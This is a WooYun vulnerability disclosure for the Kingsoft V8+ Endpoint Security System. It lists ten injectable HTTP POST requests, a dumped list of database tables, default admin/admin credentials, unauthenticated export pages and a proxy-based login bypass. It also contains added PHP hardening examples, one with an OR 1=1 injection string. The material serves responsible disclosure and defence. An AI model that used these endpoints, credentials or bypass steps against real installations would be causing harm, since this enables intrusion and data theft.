Kingsoft V8+ Endpoint Security System: 10 SQL injections (login required) + insecure default configuration + backend authorization bypass, and other vulnerabilities

admin | 2017-04-22 00:17:05 | 618 views | 232 characters | 46-second read

Summary

2016-03-01: Details sent to the vendor; awaiting vendor handling
2016-03-01: Vendor confirmed; details disclosed to the vendor only
2016-03-04: Details opened to third-party security partners (绿盟科技 NSFOCUS, 唐朝安全巡航, 无声信息)
2016-04-25: Details opened to core white hats and relevant domain experts
2016-05-05: Details opened to regular white hats
2016-05-15: Details opened to intern white hats
2016-05-30: Details made public

Vulnerability summary (17 followers)

Defect ID: WooYun-2016-179804

Title: Kingsoft V8+ Endpoint Security System: 10 SQL injections (login required) + insecure default configuration + backend authorization bypass, and other vulnerabilities

Vendor: 金山网络 (Kingsoft Network)

Author: niliu

Submitted: 2016-03-01 18:54

Published: 2016-05-30 20:10

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor confirmed

Source: www.wooyun.org

Tags: sql injection


Vulnerability details


Brief description:

Kingsoft V8+ Endpoint Security System: 10 SQL injections + insecure default configuration + backend authorization bypass

Detailed description:

First, the product introduction:

[screenshot in the original: product introduction]

There are quite a few SQL injections; the 10 points are as follows:

Code:
1.
POST /active_defense/scan/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/active_defense/scan/main.php?li=4&a=7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}


2.
POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 408
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"20","log_request_page":"2","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

3.
POST /report/report/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 205
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/report/main.php?li=5&a=14
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_report_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","period_type":"-1","count_page":"2","request_page":"1","VHierarchyID":"ADMIN"}}

4.
POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 409
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"100","log_request_page":"1","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

5.
POST /softmanagement/distribute/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/distribute/main.php?li=3&a=6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

6.
POST /boundary_manage/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 372
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%221%22%2C%22stype%22%3A%221%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A1%7D
Referer: **.**.**.**:6868/boundary_manage/boundary_file.php?li=2&a=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_file_name_details_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","groupids":["1"],"boundary_type":"5","time_type":"4","start_time":"0","end_time":"0","file_md5":"72C84AE241A44567B31CA2B4FB7557C9","sort_type":"download_time","sort_order":"desc","page_count":"10","current_page":"1"}}

7.
POST /client_manage/group/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%226%22%2C%22rtype%22%3A%225%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A2%7D; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/client_manage/group/main.php?li=1&a=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

8.
POST /settings/system/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/settings/system/groups.php?li=6&a=15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

9.
POST /softmanagement/forbidden/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

10.
POST /softmanagement/forbidden/get_classify_list_info_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 288
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_classify_list_info_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","classify_id":"-1","group_id":"ADMIN","key_words":"3","count_page":"20","current_page":"1","sort_type":"state","sort_order":"desc"}}

Proof of vulnerability:


Code:
Database: SQLite_masterdb
[69 tables]
+-----------------------------+
| ArpClientMacIp |
| ArpInfo |
| ArpInfo_History |
| ArpOptions |
| BDLogManagerOptions |
| BoundaryOptions |
| ClientDelete |
| ClientInfoCollect |
| ClientScanFinishInfo |
| ClientStaInfo |
| ClientUpdateOptions |
| ClientVersionInfo |
| ClientVirusCollect |
| DefaultPopedom |
| DomainGroupInfo |
| GroupInfo |
| HostInfo |
| HostSoftLeakScanInfo |
| HostSysLeakScanInfo |
| IPFilter |
| KChildSysCenterIPInfo |
| KClearOpenOptions |
| KFilePushInfo |
| KForbidSoftInfo |
| KGroupIP |
| KLncncCompanyInfo |
| KReport |
| KSimpleSoftInfo |
| KSoftUninstallStrategy |
| KSoftWareMgrOptions |
| KUninstallSoftInfo |
| KVDeviceGroupIP |
| KVDeviceGroupInfo |
| KVDipatcherPlanTask |
| KVMEngineOptions |
| LeakRepairStategy |
| LeakScanRepairCmd |
| MailMonOptions |
| MailMonVirusInfo |
| NetWorkManagerInfo |
| ReportIndex |
| ReportOnlineIPSet |
| ReportStrategy |
| RootWhiteListInfo |
| SCMessageLog |
| SCOperLog |
| SCOperation |
| SCUser |
| ScanConfigOptions |
| ScanOptions |
| StrongManagerOptions |
| SysMonitorOpt |
| SystemCenterTree |
| TaskOptions |
| UDiskAgentOptions |
| UDiskOptions |
| USBOptions |
| UninstallKavClientIPs |
| UserPopedom |
| VHierarchyBaseVirusDealInfo |
| VHierarchyInfo |
| VHierarchySetupInfo |
| VirusCountInfo |
| VirusInfo |
| ViuusInfoCollect |
| WatchOptions |
| _GroupInfo_old_20131010 |
| sqlite_sequence |
| webconfig |
+-----------------------------+
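As an added example that is not part of the original report or of Kingsoft's code, the PHP handler below shows how a command shaped like get_log_cmd (request 2 above) can be served without building SQL from request strings: list values are whitelisted, paging values are validated as integers, and everything else is bound through PDO against the SQLite backend the proof above reveals. The column names and the handler name are assumptions; only the table name VirusInfo appears on the page.

```php
<?php
// Added example, not code from Kingsoft's product: a hardened server-side handler for a
// JSON command shaped like get_log_cmd in request 2, using PDO + SQLite (the report
// shows the backend database is SQLite). Column names are assumed.
declare(strict_types=1);

function handle_get_log_cmd(PDO $db, array $cmd): array
{
    // 1. Whitelist list values; anything outside the known ids is dropped, never quoted.
    $allowed = ['1', '2', '3', '4', '5', '6', '7'];
    $raw = $cmd['log_virus_type'] ?? [];
    $types = is_array($raw)
        ? array_values(array_filter($raw, fn($v) => is_string($v) && in_array($v, $allowed, true)))
        : [];
    if ($types === []) {
        throw new InvalidArgumentException('log_virus_type must list known type ids');
    }
    // 2. Paging fields are bounded integers; LIMIT/OFFSET must not be built from strings.
    $count = filter_var($cmd['log_count_page'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 500]]);
    $page = filter_var($cmd['log_request_page'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($count === false || $page === false) {
        throw new InvalidArgumentException('paging fields must be positive integers');
    }
    $search = is_string($cmd['search_text'] ?? null) ? $cmd['search_text'] : '';

    // 3. One placeholder per list element; user data never becomes part of the SQL text.
    $marks = implode(',', array_fill(0, count($types), '?'));
    $stmt = $db->prepare(
        "SELECT virus_name, host_ip, log_time FROM VirusInfo
          WHERE virus_type IN ($marks) AND virus_name LIKE ? ESCAPE '\\'
          ORDER BY log_time DESC LIMIT ? OFFSET ?"
    );
    $i = 1;
    foreach ($types as $t) {
        $stmt->bindValue($i++, $t, PDO::PARAM_STR);
    }
    // Escape LIKE metacharacters so search text cannot widen the pattern either.
    $stmt->bindValue($i++, '%' . addcslashes($search, '%_\\') . '%', PDO::PARAM_STR);
    $stmt->bindValue($i++, $count, PDO::PARAM_INT);
    $stmt->bindValue($i++, ($page - 1) * $count, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo against a constructed in-memory table, fed a body shaped like request 2 that
// carries a quote-based value in the type list; the whitelist simply discards it.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE VirusInfo (virus_name TEXT, virus_type TEXT, host_ip TEXT, log_time INTEGER)');
$db->exec("INSERT INTO VirusInfo VALUES ('Trojan.Test', '1', '10.0.0.5', 1456800000),
                                        ('Worm.Test', '3', '10.0.0.7', 1456800100)");
$body = json_decode('{"get_log_cmd":{"log_virus_type":["1","3","1\' OR 1=1--"],'
    . '"search_text":"Test","log_count_page":"20","log_request_page":"1"}}', true);
echo json_encode(handle_get_log_cmd($db, $body['get_log_cmd'])), PHP_EOL;
```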

Insecure default configuration: the system has directory listing (directory browsing) enabled by default.

A few examples:

Code:
http://**.**.**.**/boundary_manage/
**.**.**.**:6868/active_defense/
**.**.**.**:6868/report/
http://**.**.**.**/active_defense/
**.**.**.**:6868/settings/

There are many more that I will not list; here are a few cases to prove it:


I then found that many pages can be accessed without authorization. There are too many pages to try one by one, so the vendor should restrict them across the board; any file with "excel" in its name directly downloads the corresponding data.

A few of them:

Code:
**.**.**.**:6868/active_defense/scan/task.php
**.**.**.**:6868/active_defense/scan/export.php
**.**.**.**:6868/report/log/excel2.php
**.**.**.**:6868/report/log/analyse.php
**.**.**.**:6868/report/log/date_select.php
**.**.**.**:6868/report/log/excel.php
**.**.**.**:6868/report/general/ksafecount.php
http://**.**.**.**/active_defense/scan/task.php
http://**.**.**.**/boundary_manage/boundary_file_report.php
http://**.**.**.**/active_defense/scan/task.php


Incidentally, the backend has the default credentials admin/admin.


The data visible through the unauthorized access above was fairly limited, so I tested further and found that the backend can be bypassed entirely...

Every page in the system checks whether the user is logged in when it is accessed; the request is as follows:

Code:
GET /login.php HTTP/1.1
Host: **.**.**.**:6868
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: **.**.**.**:6868/settings/system/groups.php?li=0&a=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8

This request redirects to the login page, so simply blocking that URL in Fiddler bypasses the check.
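As an added example that is not from the report or from the product, the PHP below contrasts a login check that the bypass just described defeats (the protected page is delivered and the redirect is left to the browser) with a gate enforced server-side before any output. The session key uid, the page body and the function names are assumptions.

```php
<?php
// Added example, not Kingsoft's code. It contrasts the kind of login check that the
// proxy bypass above defeats with a check that holds server-side. The session key
// name and the page body are assumed.
declare(strict_types=1);

// Weak pattern: the protected content is written out first, and the redirect to
// /login.php is only a hint left to the browser. Dropping that follow-up request in a
// proxy leaves the already-delivered data on screen. header('Location: ...') without
// exit fails the same way, because the rest of the script still runs and emits output.
function groups_page_weak(): void
{
    echo "<h1>Groups</h1>\n<!-- group table with host data -->\n";
    if (empty($_SESSION['uid'])) {
        echo "<script>location.href='/login.php';</script>\n";
    }
}

// Hardened pattern for HTML pages: decide before any output, answer with the redirect
// only, and stop executing so no protected content ever reaches the response.
function require_login(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['uid'])) {
        header('Cache-Control: no-store');
        header('Location: /login.php', true, 302);
        exit;
    }
}

// Same gate for data endpoints (the .kptl command handlers and the excel*.php
// exporters listed above): an XHR or download client should get 401, not a redirect
// that a script can ignore.
function require_login_api(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['uid'])) {
        http_response_code(401);
        header('Content-Type: application/json');
        echo json_encode(['error' => 'not authenticated']);
        exit;
    }
}

// Usage: the first statement of every protected page or endpoint, before any output.
// require_login();      // e.g. settings/system/groups.php
// require_login_api();  // e.g. report/log/get_log_cmd.kptl, report/log/excel.php
```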


It is then possible to view the system configuration and passwords, edit the announcement (and the announcement field has an XSS), and upload "popular tools"...

The result:


Fix recommendation:

Input filtering + access control

Copyright notice: please credit the source when reposting: niliu@乌云 (WooYun)


Vendor response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2016-03-01 20:06

Vendor reply:

Thank you for your attention to Kingsoft security; this has been forwarded to the business team to follow up and fix. Thank you for the submission.

Latest status:

None yet




Comments

  1. 2016-03-01 21:05 | HackBraid ( Core white hat | Rank:1914 | Vulnerabilities: 304 | Someone has recently been impersonating this account to commit fraud; anyone claiming to be HackBrai...)

    1

    Front-row seat to pay respects to master niliu
